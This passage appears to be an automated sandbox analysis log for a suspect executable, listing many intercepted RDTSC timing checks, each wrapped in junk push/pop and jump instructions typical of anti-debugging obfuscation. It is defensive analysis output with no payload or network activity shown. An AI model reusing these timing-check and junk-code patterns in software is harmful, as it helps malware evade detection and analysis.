                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1185949 second address: 1185957 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD09CB0C7EAh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1185957 second address: 1185965 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD09CF151B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1185965 second address: 1185969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1188CFB second address: 1188D03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1188D03 second address: 1188D21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD09CB0C7F8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11886C1 second address: 11886D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD09CF151BDh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11886D2 second address: 11886D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11886D6 second address: 11886DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 118894B second address: 118895A instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD09CB0C7E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 118895A second address: 1188964 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FD09CF151B6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 118E4FF second address: 118E509 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD09CB0C7E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 118E509 second address: 118E54C instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD09CF151BCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FD09CF151C0h 0x00000012 jmp 00007FD09CF151BFh 0x00000017 push eax 0x00000018 pop eax 0x00000019 jmp 00007FD09CF151BEh 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 118EB7B second address: 118EB97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FD09CB0C7F7h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 118EEF4 second address: 118EEFB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 118EEFB second address: 118EF06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 118F687 second address: 118F68D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 118F68D second address: 118F6D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 pushad 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a jns 00007FD09CB0C7E6h 0x00000010 popad 0x00000011 jne 00007FD09CB0C7EEh 0x00000017 push ecx 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007FD09CB0C7F8h 0x0000001f pop ecx 0x00000020 pushad 0x00000021 jng 00007FD09CB0C7E6h 0x00000027 pushad 0x00000028 popad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11987A0 second address: 11987A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1198911 second address: 119894A instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD09CB0C7FDh 0x00000008 pushad 0x00000009 jmp 00007FD09CB0C7F7h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 119894A second address: 1198950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1198BF9 second address: 1198C1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD09CB0C7F7h 0x0000000c jo 00007FD09CB0C7E6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1198C1D second address: 1198C23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1198FCA second address: 1199011 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD09CB0C7F2h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b jmp 00007FD09CB0C7F7h 0x00000010 pop eax 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 jo 00007FD09CB0C7E8h 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FD09CB0C7EAh 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1199011 second address: 1199017 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1199017 second address: 119903C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD09CB0C7ECh 0x00000009 jmp 00007FD09CB0C7F5h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 119F298 second address: 119F2A2 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD09CF151B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 119F2A2 second address: 119F2B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FD09CB0C7EDh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 119F2B8 second address: 119F2CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FD09CF151BAh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 119F2CB second address: 119F2EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CB0C7F7h 0x00000007 jne 00007FD09CB0C7E6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 119F2EC second address: 119F2F1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 119F413 second address: 119F45B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FD09CB0C7E6h 0x0000000a pushad 0x0000000b jmp 00007FD09CB0C7ECh 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 js 00007FD09CB0C7E6h 0x00000018 jns 00007FD09CB0C7E6h 0x0000001e popad 0x0000001f jno 00007FD09CB0C7EEh 0x00000025 popad 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FD09CB0C7EAh 0x0000002e jg 00007FD09CB0C7E6h 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 119F45B second address: 119F498 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CF151BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD09CF151C7h 0x00000010 jmp 00007FD09CF151C5h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 119F793 second address: 119F799 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 119F799 second address: 119F7D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD09CF151BFh 0x00000009 jmp 00007FD09CF151C9h 0x0000000e popad 0x0000000f jmp 00007FD09CF151BBh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 119FC0C second address: 119FC16 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD09CB0C7E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 119FD75 second address: 119FD80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FD09CF151B6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 119FD80 second address: 119FD95 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FD09CB0C7F0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11A1026 second address: 11A1031 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FD09CF151B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11A1031 second address: 11A1037 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11A1037 second address: 11A103F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11A103F second address: 11A1045 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11A1045 second address: 11A1050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 119EE90 second address: 119EE94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 119EE94 second address: 119EEAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD09CF151C1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11A83AF second address: 11A83EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD09CB0C7EDh 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c pushad 0x0000000d jns 00007FD09CB0C7F2h 0x00000013 jmp 00007FD09CB0C7F0h 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11A83EA second address: 11A83EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11B41FC second address: 11B421C instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD09CB0C7E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FD09CB0C7F6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11B421C second address: 11B4222 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11B4222 second address: 11B4226 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11B4226 second address: 11B422A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11B3BDD second address: 11B3BED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 ja 00007FD09CB0C811h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11B3BED second address: 11B3C07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CF151C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11B3D43 second address: 11B3D4D instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD09CB0C7E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11B3D4D second address: 11B3D5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11B3D5A second address: 11B3D70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FD09CB0C7E6h 0x0000000a jnl 00007FD09CB0C7E6h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11B3D70 second address: 11B3DA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD09CF151C9h 0x00000009 pushad 0x0000000a popad 0x0000000b jnc 00007FD09CF151B6h 0x00000011 popad 0x00000012 popad 0x00000013 pushad 0x00000014 pushad 0x00000015 jmp 00007FD09CF151BCh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11B9336 second address: 11B9346 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FD09CB0C7EAh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11B9346 second address: 11B934C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11B8EAB second address: 11B8EAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11B901F second address: 11B902B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FD09CF151B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11B902B second address: 11B902F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11B902F second address: 11B9066 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CF151C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD09CF151C7h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11C09B4 second address: 11C09BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11C09BD second address: 11C09C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10E070B second address: 10E0711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10E0711 second address: 10E072C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD09CF151C5h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11C894B second address: 11C8951 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11C8951 second address: 11C8955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11D24B7 second address: 11D24C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jp 00007FD09CB0C7E6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11D24C5 second address: 11D24FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jnc 00007FD09CF151B6h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push edx 0x00000012 jmp 00007FD09CF151C2h 0x00000017 jmp 00007FD09CF151BCh 0x0000001c pop edx 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push esi 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11D24FC second address: 11D2517 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FD09CB0C7F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11D28F3 second address: 11D28F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11D28F7 second address: 11D290B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FD09CB0C7E8h 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11D290B second address: 11D290F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11D2A7A second address: 11D2A80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11D2A80 second address: 11D2A86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11D2A86 second address: 11D2A8B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11D394B second address: 11D3950 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11D3950 second address: 11D3994 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD09CB0C7F9h 0x00000009 pop edx 0x0000000a jl 00007FD09CB0C7ECh 0x00000010 jl 00007FD09CB0C7E6h 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FD09CB0C7F6h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11D3994 second address: 11D399E instructions: 0x00000000 rdtsc 0x00000002 js 00007FD09CF151BEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11D52CB second address: 11D52F5 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD09CB0C7E6h 0x00000008 jmp 00007FD09CB0C7F8h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007FD09CB0C7E6h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11D52F5 second address: 11D52F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11D7D70 second address: 11D7D92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FD09CB0C7F2h 0x0000000c ja 00007FD09CB0C7E6h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11D7D92 second address: 11D7D9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11D7D9A second address: 11D7DCE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FD09CB0C7F8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jo 00007FD09CB0C800h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FD09CB0C7EAh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11D7DCE second address: 11D7DD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11D99EE second address: 11D99FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007FD09CB0C7E6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11E2925 second address: 11E292B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11E292B second address: 11E295E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FD09CB0C7F5h 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f jns 00007FD09CB0C7E6h 0x00000015 pop ebx 0x00000016 jnp 00007FD09CB0C7F2h 0x0000001c jnp 00007FD09CB0C7E6h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11E295E second address: 11E2968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
